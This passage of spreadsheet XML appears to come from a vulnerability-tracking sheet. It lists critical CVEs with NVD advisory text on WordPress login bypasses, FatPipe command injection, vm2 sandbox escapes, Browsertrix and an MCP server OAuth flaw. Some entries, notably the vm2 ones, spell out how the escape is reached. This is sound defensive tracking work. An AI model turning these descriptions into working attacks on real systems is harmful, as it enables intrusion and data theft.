      <c r="B28" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C28" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62108</t>
        </is>
      </c>
      <c r="D28" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E28" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F28" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G28" s="5" t="inlineStr"/>
      <c r="H28" s="5" t="inlineStr"/>
      <c r="I28" s="5" t="inlineStr"/>
      <c r="J28" s="5" t="inlineStr"/>
      <c r="K28" s="5" t="inlineStr"/>
      <c r="L28" s="5" t="inlineStr"/>
      <c r="M28" s="5" t="inlineStr"/>
      <c r="N28" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O28" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P28" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q28" s="5" t="inlineStr"/>
      <c r="R28" s="5" t="inlineStr">
        <is>
          <t>CWE-290</t>
        </is>
      </c>
      <c r="S28" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Broken Authentication in Headless Single Sign On &lt;= 1.7.0 versions.</t>
        </is>
      </c>
      <c r="T28" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62108</t>
        </is>
      </c>
    </row>
    <row r="29">
      <c r="A29" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B29" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C29" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86707</t>
        </is>
      </c>
      <c r="D29" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E29" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F29" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G29" s="5" t="inlineStr"/>
      <c r="H29" s="5" t="inlineStr"/>
      <c r="I29" s="5" t="inlineStr"/>
      <c r="J29" s="5" t="inlineStr"/>
      <c r="K29" s="5" t="inlineStr"/>
      <c r="L29" s="5" t="inlineStr"/>
      <c r="M29" s="5" t="inlineStr"/>
      <c r="N29" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O29" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P29" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q29" s="5" t="inlineStr"/>
      <c r="R29" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="S29" s="5" t="inlineStr">
        <is>
          <t>The Private Feed Key WordPress plugin through 0.1 does not verify that the key used to authenticate a feed request is one it issued, matching any stored user metadata value instead, which allows unauthenticated attackers to log in as any user, including administrators.</t>
        </is>
      </c>
      <c r="T29" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86707</t>
        </is>
      </c>
    </row>
    <row r="30">
      <c r="A30" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B30" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C30" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86709</t>
        </is>
      </c>
      <c r="D30" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E30" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F30" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G30" s="5" t="inlineStr"/>
      <c r="H30" s="5" t="inlineStr"/>
      <c r="I30" s="5" t="inlineStr"/>
      <c r="J30" s="5" t="inlineStr"/>
      <c r="K30" s="5" t="inlineStr"/>
      <c r="L30" s="5" t="inlineStr"/>
      <c r="M30" s="5" t="inlineStr"/>
      <c r="N30" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O30" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P30" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q30" s="5" t="inlineStr"/>
      <c r="R30" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="S30" s="5" t="inlineStr">
        <is>
          <t>The Pressengine WordPress plugin through 1.0 does not stop its login handler from issuing a session when authentication fails, allowing unauthenticated attackers to log in as any user, including administrators.</t>
        </is>
      </c>
      <c r="T30" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86709</t>
        </is>
      </c>
    </row>
    <row r="31">
      <c r="A31" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B31" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C31" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86710</t>
        </is>
      </c>
      <c r="D31" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E31" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F31" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G31" s="5" t="inlineStr"/>
      <c r="H31" s="5" t="inlineStr"/>
      <c r="I31" s="5" t="inlineStr"/>
      <c r="J31" s="5" t="inlineStr"/>
      <c r="K31" s="5" t="inlineStr"/>
      <c r="L31" s="5" t="inlineStr"/>
      <c r="M31" s="5" t="inlineStr"/>
      <c r="N31" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O31" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P31" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q31" s="5" t="inlineStr"/>
      <c r="R31" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="S31" s="5" t="inlineStr">
        <is>
          <t>The Login with QR WordPress plugin through 1.0.0 does not verify that the code used to log a user in is one it issued, matching any stored user metadata value instead, which allows unauthenticated attackers to log in as any user, including administrators.</t>
        </is>
      </c>
      <c r="T31" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86710</t>
        </is>
      </c>
    </row>
    <row r="32">
      <c r="A32" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B32" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C32" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87796</t>
        </is>
      </c>
      <c r="D32" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E32" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F32" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G32" s="5" t="inlineStr"/>
      <c r="H32" s="5" t="inlineStr"/>
      <c r="I32" s="5" t="inlineStr"/>
      <c r="J32" s="5" t="inlineStr"/>
      <c r="K32" s="5" t="inlineStr"/>
      <c r="L32" s="5" t="inlineStr"/>
      <c r="M32" s="5" t="inlineStr"/>
      <c r="N32" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O32" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P32" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q32" s="5" t="inlineStr"/>
      <c r="R32" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="S32" s="5" t="inlineStr">
        <is>
          <t>The Multi Uploader for Gravity Forms plugin for WordPress is vulnerable to Arbitrary File Upload in all versions up to, and including, 1.1.9 via the move_file function. This is due to insufficient file type validation during chunked upload handling. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.</t>
        </is>
      </c>
      <c r="T32" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87796</t>
        </is>
      </c>
    </row>
    <row r="33">
      <c r="A33" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B33" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C33" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90822</t>
        </is>
      </c>
      <c r="D33" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E33" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F33" s="5" t="inlineStr">
        <is>
          <t>contact@securifera.com</t>
        </is>
      </c>
      <c r="G33" s="5" t="inlineStr"/>
      <c r="H33" s="5" t="inlineStr"/>
      <c r="I33" s="5" t="inlineStr"/>
      <c r="J33" s="5" t="inlineStr"/>
      <c r="K33" s="5" t="inlineStr"/>
      <c r="L33" s="5" t="inlineStr"/>
      <c r="M33" s="5" t="inlineStr"/>
      <c r="N33" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O33" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P33" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q33" s="5" t="inlineStr"/>
      <c r="R33" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S33" s="5" t="inlineStr">
        <is>
          <t>FatPipe MPVPN, WARP, and IPVPN appliances running the end-of-life firmware version 10.1.2r60p100 contain an OS command injection vulnerability in the xtremed daemon. An unauthenticated remote attacker with access to the affected management interface can submit crafted input to the AuthFormServlet endpoint, causing authentication data to be processed by a shell and allowing arbitrary commands to execute as root.
The affected management interface is disabled by default and must be affirmatively enabled by the customer before the endpoint becomes reachable. FatPipe recommends restricting management access to trusted administrative networks and using WAN access control lists to limit access to trusted sources.
Customers running the affected end-of-life firmware can contact FatPipe Support for help confirming their firmware version and upgrading to a current supported release at https://www.fatpipeinc.com/support/support, support@fatpipeinc.com, or +1 800-724-8521 (option 3).</t>
        </is>
      </c>
      <c r="T33" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90822</t>
        </is>
      </c>
    </row>
    <row r="34">
      <c r="A34" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B34" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C34" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90823</t>
        </is>
      </c>
      <c r="D34" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E34" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F34" s="5" t="inlineStr">
        <is>
          <t>contact@securifera.com</t>
        </is>
      </c>
      <c r="G34" s="5" t="inlineStr"/>
      <c r="H34" s="5" t="inlineStr"/>
      <c r="I34" s="5" t="inlineStr"/>
      <c r="J34" s="5" t="inlineStr"/>
      <c r="K34" s="5" t="inlineStr"/>
      <c r="L34" s="5" t="inlineStr"/>
      <c r="M34" s="5" t="inlineStr"/>
      <c r="N34" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O34" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P34" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q34" s="5" t="inlineStr"/>
      <c r="R34" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S34" s="5" t="inlineStr">
        <is>
          <t>FatPipe MPVPN, WARP, and IPVPN appliances running the end-of-life firmware version 10.1.2r60p100 contain a stack-based buffer overflow in /usr/sbin/auth_user_pass. An unauthenticated remote attacker with access to the affected management interface can submit a crafted authentication request that reaches an unchecked copy into a fixed-size stack buffer, potentially allowing arbitrary code execution as root.
The affected management interface is disabled by default and must be affirmatively enabled by the customer before the endpoint becomes reachable. FatPipe recommends restricting management access to trusted administrative networks and using WAN access control lists to limit access to trusted sources.
Customers running the affected end-of-life firmware can contact FatPipe Support for help confirming their firmware version and upgrading to a current supported release at https://www.fatpipeinc.com/support/support, support@fatpipeinc.com, or +1 800-724-8521 (option 3).</t>
        </is>
      </c>
      <c r="T34" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90823</t>
        </is>
      </c>
    </row>
    <row r="35">
      <c r="A35" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B35" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C35" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92944</t>
        </is>
      </c>
      <c r="D35" s="5" t="n">
        <v>9.800000000000001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2026-09-17</t>
        </is>
      </c>
      <c r="P35" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q35" s="5" t="inlineStr"/>
      <c r="R35" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="S35" s="5" t="inlineStr">
        <is>
          <t>vm2 versions 3.10.2 through 3.11.6 contain a sandbox escape vulnerability on Node.js 26 where Promise.prototype.finally() bypasses vm2's wrapper protections due to a stale PromiseThenLookupChain protector in V8 14.6. Attackers can exploit this by creating an async function that returns a Promise with an attacker-controlled constructor Symbol.species, allowing them to reach the host Function constructor and process object for arbitrary code execution.</t>
        </is>
      </c>
      <c r="T35" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92944</t>
        </is>
      </c>
    </row>
    <row r="36">
      <c r="A36" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B36" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C36" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54053</t>
        </is>
      </c>
      <c r="D36" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E36" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F36" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G36" s="5" t="inlineStr"/>
      <c r="H36" s="5" t="inlineStr"/>
      <c r="I36" s="5" t="inlineStr"/>
      <c r="J36" s="5" t="inlineStr"/>
      <c r="K36" s="5" t="inlineStr"/>
      <c r="L36" s="5" t="inlineStr"/>
      <c r="M36" s="5" t="inlineStr"/>
      <c r="N36" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O36" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P36" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q36" s="5" t="inlineStr"/>
      <c r="R36" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S36" s="5" t="inlineStr">
        <is>
          <t>Many Notes is a Markdown note-taking web application designed for simplicity. Prior to 0.16.0, the ZIP vault import implemented in app/Actions/ProcessImportedVault.php accepts archive filenames containing parent-directory traversal segments. An authenticated user can write arbitrary files outside the importing user's vault and into other users' vaults, including overwriting existing files. Disguised SVG content can be placed in another user's vault and execute stored cross-site scripting when the victim opens that vault. This issue is fixed in version 0.16.0.</t>
        </is>
      </c>
      <c r="T36" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54053</t>
        </is>
      </c>
    </row>
    <row r="37">
      <c r="A37" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B37" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C37" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54752</t>
        </is>
      </c>
      <c r="D37" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E37" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F37" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G37" s="5" t="inlineStr"/>
      <c r="H37" s="5" t="inlineStr"/>
      <c r="I37" s="5" t="inlineStr"/>
      <c r="J37" s="5" t="inlineStr"/>
      <c r="K37" s="5" t="inlineStr"/>
      <c r="L37" s="5" t="inlineStr"/>
      <c r="M37" s="5" t="inlineStr"/>
      <c r="N37" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O37" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P37" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q37" s="5" t="inlineStr"/>
      <c r="R37" s="5" t="inlineStr">
        <is>
          <t>CWE-502, CWE-829</t>
        </is>
      </c>
      <c r="S37" s="5" t="inlineStr">
        <is>
          <t>NetBox Device Type Library is a collection of community-sourced device type definitions for import into NetBox. The validation test harness can deserialize pull-request-controlled tracked pickle cache files through pickle.load in the read_pickle_data function in tests/pickle_operations.py. An unauthenticated contributor can change USE_LOCAL_KNOWN_SLUGS in tests/test_configuration.py and supply a crafted tests/known-modules.pickle or tests/known-racks.pickle file that tests/definitions_test.py loads when pytest runs. Deserialization invokes attacker-controlled object reduction behavior, allowing arbitrary code execution in the GitHub Actions runner or in a maintainer process that runs the tests, with the confidentiality, integrity, and availability of reachable resources at risk. This vulnerability is fixed with commit 1c6f7e2b93589b965318c6e67ac3504831f0e71e.</t>
        </is>
      </c>
      <c r="T37" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54752</t>
        </is>
      </c>
    </row>
    <row r="38">
      <c r="A38" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B38" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C38" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87701</t>
        </is>
      </c>
      <c r="D38" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E38" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F38" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G38" s="5" t="inlineStr"/>
      <c r="H38" s="5" t="inlineStr"/>
      <c r="I38" s="5" t="inlineStr"/>
      <c r="J38" s="5" t="inlineStr"/>
      <c r="K38" s="5" t="inlineStr"/>
      <c r="L38" s="5" t="inlineStr"/>
      <c r="M38" s="5" t="inlineStr"/>
      <c r="N38" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O38" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P38" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q38" s="5" t="inlineStr"/>
      <c r="R38" s="5" t="inlineStr">
        <is>
          <t>CWE-74</t>
        </is>
      </c>
      <c r="S38" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements in output used by a downstream component ('injection') in Azure Cosmos DB allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T38" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87701</t>
        </is>
      </c>
    </row>
    <row r="39">
      <c r="A39" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B39" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C39" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92934</t>
        </is>
      </c>
      <c r="D39" s="5" t="n">
        <v>9.5</v>
      </c>
      <c r="E39" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F39" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G39" s="5" t="inlineStr"/>
      <c r="H39" s="5" t="inlineStr"/>
      <c r="I39" s="5" t="inlineStr"/>
      <c r="J39" s="5" t="inlineStr"/>
      <c r="K39" s="5" t="inlineStr"/>
      <c r="L39" s="5" t="inlineStr"/>
      <c r="M39" s="5" t="inlineStr"/>
      <c r="N39" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O39" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P39" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q39" s="5" t="inlineStr"/>
      <c r="R39" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="S39" s="5" t="inlineStr">
        <is>
          <t>vm2 before 3.11.8 contains an incomplete fix for Error.cause sanitization that allows sandbox escape when revisited host-wrapped AggregateError objects are caught within a single exception handler traversal. Attackers can exploit cycle detection bypass in handleException to access unsanitized host proxies embedded in the errors array, enabling full remote code execution and process information disclosure from the sandbox.</t>
        </is>
      </c>
      <c r="T39" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92934</t>
        </is>
      </c>
    </row>
    <row r="40">
      <c r="A40" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B40" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C40" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92935</t>
        </is>
      </c>
      <c r="D40" s="5" t="n">
        <v>9.5</v>
      </c>
      <c r="E40" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F40" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G40" s="5" t="inlineStr"/>
      <c r="H40" s="5" t="inlineStr"/>
      <c r="I40" s="5" t="inlineStr"/>
      <c r="J40" s="5" t="inlineStr"/>
      <c r="K40" s="5" t="inlineStr"/>
      <c r="L40" s="5" t="inlineStr"/>
      <c r="M40" s="5" t="inlineStr"/>
      <c r="N40" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O40" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P40" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q40" s="5" t="inlineStr"/>
      <c r="R40" s="5" t="inlineStr">
        <is>
          <t>CWE-913</t>
        </is>
      </c>
      <c r="S40" s="5" t="inlineStr">
        <is>
          <t>vm2 is a sandbox for running untrusted Node.js code. In versions &gt;= 3.11.4 and &lt;= 3.11.6, the NodeVM constructor computes `hasRealRequireConfig` with `typeof requireOpts === 'object' &amp;&amp; requireOpts !== null`, so an array-shaped `require` value (for example `require: []`) satisfies the guard that is meant to reject nesting without an explicit require configuration. `makeResolverFromLegacyOptions()` then destructures the array into undefined option fields and returns a resolver containing only `NESTING_OVERRIDE.vm2`. As a result, an attacker who can supply JavaScript executed by a NodeVM configured with truthy `nesting` and an array-shaped `require` (e.g. `new NodeVM({nesting: true, require: []})`) can require the host `vm2` module, create an inner NodeVM with an attacker-chosen builtin allowlist (such as `child_process`), and execute arbitrary commands with the privileges of the host Node.js process, escaping the sandbox. Outer builtin restrictions do not constrain the attacker-created inner NodeVM. This issue is fixed in vm2 3.11.7.</t>
        </is>
      </c>
      <c r="T40" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92935</t>
        </is>
      </c>
    </row>
    <row r="41">
      <c r="A41" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B41" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C41" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54501</t>
        </is>
      </c>
      <c r="D41" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="E41" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F41" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G41" s="5" t="inlineStr"/>
      <c r="H41" s="5" t="inlineStr"/>
      <c r="I41" s="5" t="inlineStr"/>
      <c r="J41" s="5" t="inlineStr"/>
      <c r="K41" s="5" t="inlineStr"/>
      <c r="L41" s="5" t="inlineStr"/>
      <c r="M41" s="5" t="inlineStr"/>
      <c r="N41" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O41" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P41" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q41" s="5" t="inlineStr"/>
      <c r="R41" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-250, CWE-77, CWE-78, CWE-88</t>
        </is>
      </c>
      <c r="S41" s="5" t="inlineStr">
        <is>
          <t>Browsertrix is a high-fidelity, browser-based crawling service for web archiving that can be self-hosted or used through Webrecorder's hosted instance. From 1.15.0 until 1.22.8, Browsertrix improperly sanitizes Git URLs specified as Custom Behaviors, allowing command injection through /api/orgs/*/crawlconfigs/validate/custom-behavior. A user with crawler or administrator permission on the specific instance can supply a crafted Git URL that executes arbitrary operating-system commands in the backend pod. Open registration or hosted free-trial access can make the required role broadly obtainable. Successful exploitation can expose, modify, or delete application database records, archived items, browser profiles, storage data, proxy credentials, and other configured service data. This issue is fixed in version 1.22.8.</t>
        </is>
      </c>
      <c r="T41" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54501</t>
        </is>
      </c>
    </row>
    <row r="42">
      <c r="A42" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B42" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C42" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54618</t>
        </is>
      </c>
      <c r="D42" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="E42" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F42" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G42" s="5" t="inlineStr"/>
      <c r="H42" s="5" t="inlineStr"/>
      <c r="I42" s="5" t="inlineStr"/>
      <c r="J42" s="5" t="inlineStr"/>
      <c r="K42" s="5" t="inlineStr"/>
      <c r="L42" s="5" t="inlineStr"/>
      <c r="M42" s="5" t="inlineStr"/>
      <c r="N42" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O42" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P42" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q42" s="5" t="inlineStr"/>
      <c r="R42" s="5" t="inlineStr">
        <is>
          <t>CWE-306, CWE-522, CWE-601</t>
        </is>
      </c>
      <c r="S42" s="5" t="inlineStr">
        <is>
          <t>Obsidian Web MCP is a secure remote MCP server for Obsidian vaults. Prior to 0.2.0, /oauth/authorize issues an authorization code without a login, consent, or session check, and /oauth/token can exchange that code for the static VAULT_MCP_TOKEN without authenticating a client. An unauthenticated remote caller who can reach the intended tunnel deployment can therefore call /mcp and use vault_read, vault_write, vault_search, vault_list, vault_move, and vault_delete against the entire vault. Optional PKCE does not prevent an attacker-initiated flow, and unauthenticated /oauth/register also exposes a client_credentials path by returning the configured VAULT_OAUTH_CLIENT_SECRET. This issue is fixed in version 0.2.0.</t>
        </is>
      </c>
      <c r="T42" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54618</t>
        </is>
      </c>
    </row>
    <row r="43">
      <c r="A43" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B43" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C43" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92939</t>
        </is>
      </c>
      <c r="D43" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="E43" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F43" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G43" s="5" t="inlineStr"/>
      <c r="H43" s="5" t="inlineStr"/>
      <c r="I43" s="5" t="inlineStr"/>
      <c r="J43" s="5" t="inlineStr">
        <is>
          <t>openssl</t>
        </is>
      </c>
      <c r="K43" s="5" t="inlineStr"/>
      <c r="L43" s="5" t="inlineStr"/>
      <c r="M43" s="5" t="inlineStr"/>
      <c r="N43" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O43" s="5" t="inlineStr">
        <is>
